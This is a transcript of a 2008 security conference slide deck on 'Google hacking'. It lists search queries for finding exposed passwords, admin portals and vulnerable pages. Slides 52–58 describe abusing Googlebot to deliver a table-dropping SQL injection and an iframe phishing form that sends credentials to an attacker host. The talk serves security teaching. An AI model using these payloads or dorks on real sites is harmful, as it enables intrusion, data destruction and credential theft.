CITEC #CON2-Dirty Attack with Google Hacking

  • 56,176 views
Uploaded on

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
No Downloads

Views

Total Views
56,176
On Slideshare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
563
Comments
2
Likes
7

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Dirty Attacks with Google Hacking Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008
  • 2. Dirty Attacks With Google hacking What I’ve done ?!   Penetration Testing (BlackBox and WhiteBox) What is Google Hacking? What a Hacker Can do   Security Consultant ( I Hate this job !!) with vulnerable Web? Google Hacking   Active Security Researcher Database (GHDB) -------------------------------- Google Hacking   Devoted Hacker basics Google Advanced   Exploits and Vulnerabilities Disclosure Operators -------------------------------- (CWH Underground) Locating Exploits and Finding Targets   Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Tracking Down Web Bot (Developing) Etc.. Servers, Login Portals, etc.. Dirty Attacks using   Comments, Feedback ? >> prathan.ptr@gmail.com ! Googlebot (Don’t spam mail !! lol)! Google Hacking Tools -------------------------------- #w 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s
  • 3. Dirty Attacks With Google hacking What is Google Hacking ?!   It is NOT hacking into Google!! What is Google (Hacking Google: Sidejacking, XSS Spreadsheet, etc) Hacking?   Google is much more than just a simple search What a Hacker Can do with vulnerable Web? interface and engine. Google Hacking   Google hacking is the use of a search engine to locate a security vulnerability on the Database (GHDB) Internet --------------------------------   Google crawls public websites for information using Google Hacking basics an automated search and record program called Google Advanced “Googlebot”. Operators   IRC Bot using Google Hacking to find Vulnerability -------------------------------- and Exploits Locating Exploits and Finding Targets   Refers to using the Google search engine in an effort to pull sensitive information, such Tracking Down Web as credit card numbers, out of a poorly constructed Web application ! Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 4. Dirty Attacks With Google hacking What is Google Hacking ?!   Johnny Long is the “grandfather” of Google hacking. What is Google   His website http://johnny.ihackstuff.com is exclusively Hacking? dedicated to Google Hacking and you will find all sorts What a Hacker Can do with vulnerable Web? of cool information there. Google Hacking   Johnny Long Database (GHDB) •  Wrote Google Hacking for Penetration Testers; ISBN -------------------------------- 1597491764 Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 5. What a Hacker Can do with Dirty Attacks With Google hacking Vulnerable Web ?! When an attacker knows the sort of vulnerability he ! What is Google Hacking? wants to exploit but has no specific target,  The  Best  Solu-on  is  “Dirty  Google   What a Hacker Search  operators” Can do with vulnerable Web?   File Inclusion (RFI, LFI) Google Hacking Database (GHDB)   SQL Injection --------------------------------   Remote Code Execution Google Hacking basics   Arbitrary Add Admin Google Advanced   Arbitrary File Upload Operators   XSS / XSRF -------------------------------- Locating Exploits and   Directory Listing Finding Targets   Directory Traversal Tracking Down Web Servers, Login   Source code disclosure Portals, etc..   Administrative Login Portals Dirty Attacks using Googlebot   Web server Information Google Hacking Tools   Reveal Pathnames and Filenames --------------------------------   Social Engineering (Damn !! How do you get my address)
  • 6. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! We call them “googledorks”  :  Inept or foolish people as revealed by Google.   What is Google Hacking? What a Hacker Can do   Advisories and Vulnerabilities with vulnerable Web?   Error Messages that contain too much information Google Hacking Database (GHDB)   Files containing usernames and passwords --------------------------------   Footholds and juicy Info Google Hacking   Pages containing login portals basics Google Advanced   Pages containing network or vulnerability data Operators   Sensitive Directories --------------------------------   Sensitive Online Shopping Info Locating Exploits and Finding Targets   Vulnerable Files and Servers Tracking Down Web   Web Server Detection Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 7. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! h;p://johnny.ihackstuff.com/ghdb.php.   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 8. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! Pages  containing  login  portals     What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 9. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! in-tle:"ColdFusion  Administrator  Login"   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 10. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! “ColdFusion  Administrator  Login"   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 11. Dirty Attacks With Google hacking Google Hacking basics! Crawl  Website  Informa-on  with  Caches       What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 12. Dirty Attacks With Google hacking Google Hacking basics! Using  Google  as  a  Proxy  Server       What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 13. Dirty Attacks With Google hacking Google Hacking basics! Basic  Search  Operators   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Use the plus sign (+) to force a search for an overly Google Hacking Database (GHDB) common word --------------------------------   Use the minus sign (-) to exclude a term from a Google Hacking search basics   (|) / OR, admin | administrator Google Advanced   To search for a phrase, supply the phrase Operators surrounded by double quotes (" ") -------------------------------- Locating Exploits and   A period (.) serves as a single-character wildcard. Finding Targets   An asterisk (*) represents any word - not the Tracking Down Web completion of a word, as is traditionally used Servers, Login Portals, etc..   Mixed searches, Can involve both phrases and Dirty Attacks using individual terms Googlebot Google Hacking Tools --------------------------------
  • 14. Dirty Attacks With Google hacking Google Advanced Operators! Advanced  Search  Operators   What is Google Hacking? What a Hacker Can do with vulnerable Web?   filetype: Google Hacking Database (GHDB)   info: --------------------------------   define: Google Hacking basics   intext: Google   inurl: Advanced   intitle: Operators   inanchor: -------------------------------- Locating Exploits and   link: Finding Targets   site: Tracking Down Web Servers, Login   stocks: Portals, etc..   cache: Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 15. Dirty Attacks With Google hacking Google Advanced Operators! Website  Informa-on  Gathering  –  “site:www.amazon.com”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 16. Dirty Attacks With Google hacking Google Advanced Operators! Subdomains  Gathering  –  “site:amazon.com     What is Google –site:www.amazon.com”  ! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 17. Dirty Attacks With Google hacking Google Advanced Operators! Website  containing  Error  Message  –  “Error  |  Warning  site:…”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 18. Dirty Attacks With Google hacking Google Advanced Operators! Directory  Lis-ng  –  in-tle:index.of  admin  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 19. Dirty Attacks With Google hacking Google Advanced Operators! Directory  Lis-ng  –  in-tle:index.of  WS_FTP.LOG  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 20. Dirty Attacks With Google hacking Google Advanced Operators! Web  server  Informa-on  –  in-tle:index.of  “Server  at”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 21. Dirty Attacks With Google hacking Google Advanced Operators! Administra-ve  Login  Portals  –  “admin  login”    ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 22. Dirty Attacks With Google hacking Google Advanced Operators! File  robots.txt  –  “inurl:robots.txt”    ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 23. Dirty Attacks With Google hacking Google Advanced Operators! Vulnerable  File  (Robpoll.cgi)  –  “inurl:robpoll.cgi filetype:cgi” ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 24. Dirty Attacks With Google hacking Google Advanced Operators! File  containing  password  –  “AutoCreate=TRUE  password=*”! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 25. Dirty Attacks With Google hacking Google Advanced Operators! What is Google MS  Access  DB  password  –  “inurl:admin  mdb”! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 26. Dirty Attacks With Google hacking Google Advanced Operators! What is Google MS  Access  DB  password  –  “inurl:admin  mdb”! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 27. Dirty Attacks With Google hacking Google Advanced Operators! What is Google Password  File  –  “index  of  /etc"  passwd! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 28. Dirty Attacks With Google hacking Google Advanced Operators! What is Google Crack  /  Keygen…  –  94FBR  sobware! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 29. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Another way to locate exploit code is to focus on Google Hacking Database (GHDB) common strings within the source code itself --------------------------------   One way to do this is to focus on common inclusions Google Hacking or header file references basics   For Example, many C programs include the standard Google Advanced Operators input/output library functions, which are references by -------------------------------- an include statement such as #include <stdio.h> within the source code Locating Exploits and Finding   A query like this would locate C source code that Targets contained the word exploit, regardless of the file’s Tracking Down Web extension: Servers, Login Portals, etc..       Dirty Attacks using Googlebot “#include  <stdio.h>”  exploit   Google Hacking Tools --------------------------------
  • 30. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 31. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 32. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Targets  Via  Demonstra-on  Pages   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Develop a query string to locate vulnerable targets on Google Hacking Database (GHDB) the Web; the vendor’s Website is a good place to -------------------------------- discover what exactly the product’s Web pages look Google Hacking like basics   For Example, some administrators might modify the Google Advanced format of a vendor-supplied Web page to fit the Operators theme of the site --------------------------------   These types of modifications can impact the Locating Exploits effectiveness of a Google search that targets a and Finding Targets vendor-supplied page format Tracking Down Web   You can find that most sites look very similar and that Servers, Login nearly every site has a “Powered by” message at the Portals, etc.. bottom of the main page Dirty Attacks using Googlebot           Google Hacking Tools --------------------------------
  • 33. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Targets  Via  Source  Code   What is Google Hacking? What a Hacker Can do with vulnerable Web?   A hacker might use the source code of a program to Google Hacking Database (GHDB) discover ways to search for that software with Google --------------------------------   To find the best search string to locate potentially Google Hacking vulnerable targets, you can visit the Web page of the basics software vendor to find the source code of the Google Advanced offending software Operators --------------------------------   In case where source code is not available, an attacker might opt to simply download the offending Locating Exploits software and run it on a machine he controls to get and Finding Targets ideas for potential searches Tracking Down Web           Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 34. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Vulnerable  Web  Applica-on  Examples! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 35. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Vulnerable  Web  Applica-on  Examples! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 36. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Finding  targets  via  “powered  by”  –  “Powered  By  cubecart”   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 37. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  “Microsob-­‐IIS/5.0  Server  at” ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 38. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! IIS  HTTP/1.1  Error  Page  Titles! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 39. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  IIS    5.0  –  intext:“404  Object  Not  Found”  Microsob   What is Google Hacking? IIS/5.0! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 40. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  “Apache”  “Server  at”  –in-tle:index.of  in-tle:error  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 41. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Apache  2.0  Error  Pages! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 42. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Default  Pages  for  Web  Servers! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 43. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Outlook  Web  Access  Default  Portal  –  inurl:“exchange/ What is Google Hacking? logon.asp”! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 44. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Windows  Registry  Entries  Can  Reveal  Passwords  –  filetype:reg   What is Google Hacking? intext:"internet  account  manager"! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 45. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 46. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 47. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider   What is Google Hacking? for  ODBC  Drivers  error”    ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 48. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider   What is Google Hacking? for  ODBC  Drivers  error”    ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 49. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  XSS/XSRF  –  inurl:“error.asp?msg=”! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 50. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! What is Google Googlebot,  Google’s  Web  Crawler! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced <a href=http://www.mict.go.th>MICT</a> Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 51. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Google’s  Query  Processor! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 52. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! SQL  Injec-on  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking We search in Google one of signatures: Database (GHDB) inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE -------------------------------- Google Hacking DB Provider for SQL Server” basics Finding the link: Google Advanced Operators http://www.hackme.com/cat.asp?ID=1 -------------------------------- Locating Exploits and Create the file test.html the code is: Finding Targets <html> Tracking Down Web Servers, Login <a href=“http://www.hackme.com/cat.asp? Portals, etc.. ID=1+drop+table+’users’—”>Click Here</a> Dirty Attacks using Googlebot </html> Google Hacking Tools --------------------------------
  • 53. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! SQL  Injec-on  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Then upload to: Database (GHDB) http://www.mysite.com/test.html -------------------------------- Google Hacking After a few days GoogleBot will index the file: basics Google Advanced http://www.mysite.com/test.html Operators Then index the link “Click Here” inside the file: -------------------------------- Locating Exploits and http://www.hackme.com/cat.asp?ID=1+drop+table Finding Targets +’users’— Tracking Down Web Servers, Login The application SQL query is: Portals, etc.. Dirty Attacks SELECT Username FROM users WHERE ID=1 using Googlebot drop table ‘users’— Google Hacking Tools -------------------------------- The Result: The table “users” has been deleted, thanks to Google
  • 54. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Google’s  Query  Processor! <a href=“http:// What is Google Hacking? www.hackeme.co m/cat.asp? What a Hacker Can do with vulnerable Web? ID=1+drop+table +’users’—”>Click Google Hacking Database (GHDB) Here</a> -------------------------------- Google Hacking basics <a href=“http:// Google Advanced www.hackeme.co Operators m/cat.asp? -------------------------------- ID=1+drop+table Locating Exploits and +’users’—”>Click Finding Targets Here</a> Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools /cat.asp?ID=1+drop -------------------------------- +table+’users’—
  • 55. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do We search in Google one of signatures: with vulnerable Web? inurl:”.asp?msg=“,inurl:”.asp?title=“,.. Google Hacking Database (GHDB) We find the link: -------------------------------- http://www.CITEC.com/bank/Login.asp?MsgError=Access Google Hacking basics denied Google Advanced Create the file 1.html the code is: Operators -------------------------------- <html> Locating Exploits and <title>CITEC Bank | Login CITEC | CITEC Account</ Finding Targets title> Tracking Down Web Servers, Login <a href=“http://www.CITEC.com/bank/Login.asp? Portals, etc.. MsgError=<iframe src=‘http://www.social.com/ Dirty Attacks using Googlebot 2.html’></iframe>”>CITEC Bank</a> Google Hacking Tools </html> --------------------------------
  • 56. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? And the file 2.html Google Hacking <form method=“post” action=“http:// Database (GHDB) www.social.com/1.php> -------------------------------- Google Hacking Username: <input type=“text” name=“user”><br> basics Password: <input type=“password” name=“pass”> Google Advanced Operators <input type=“submit” value=“Send”> -------------------------------- </form> Locating Exploits and Finding Targets Tracking Down Web Servers, Login Then upload All The Files to: Portals, etc.. http://www.social.com/ Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 57. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? After a few days GoogleBot will index the file: Google Hacking Database (GHDB) http://www.social.com/1.html -------------------------------- Google Hacking basics Then will index the link “CITEC Bank”(that Google Advanced within the file): Operators http://www.CITEC.com/bank/Login.asp? -------------------------------- Locating Exploits and MsgError=<iframe src=‘http://www.social.com/2.html’></ Finding Targets iframe> Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 58. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? The users that search “CITEC Bank” will find Google Hacking the above link and when getting inside the link Database (GHDB) -------------------------------- they will see this form: Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools The Result: Many Users are being Manipulated by the -------------------------------- attacker which uses Google in order to execute a Phishing attack (with XSS).
  • 59. Dirty Attacks With Google hacking Google Hacking Tools! What is Google Google  Hacking  Database  (GHDB)! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 60. Dirty Attacks With Google hacking Google Hacking Tools! What is Google Gooscan! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 61. Dirty Attacks With Google hacking Google Hacking Tools! What is Google SiteDigger  Tools! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 62. Dirty Attacks With Google hacking Google Hacking Tools! Goolink  –  This  is  very  handy  for  finding  vulnerable  site  wide  open  to   What is Google Hacking? google  and  googlebots! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 63. Dirty Attacks With Google hacking Google Hacking Tools! What is Google GoolagScanner  –  Enable  to  Audit  Website  via  Google! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 64. Dirty Attacks With Google hacking Spike Bot – (By Me )! What is Google Hacking? Google  Links  with  Spike  Bot ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
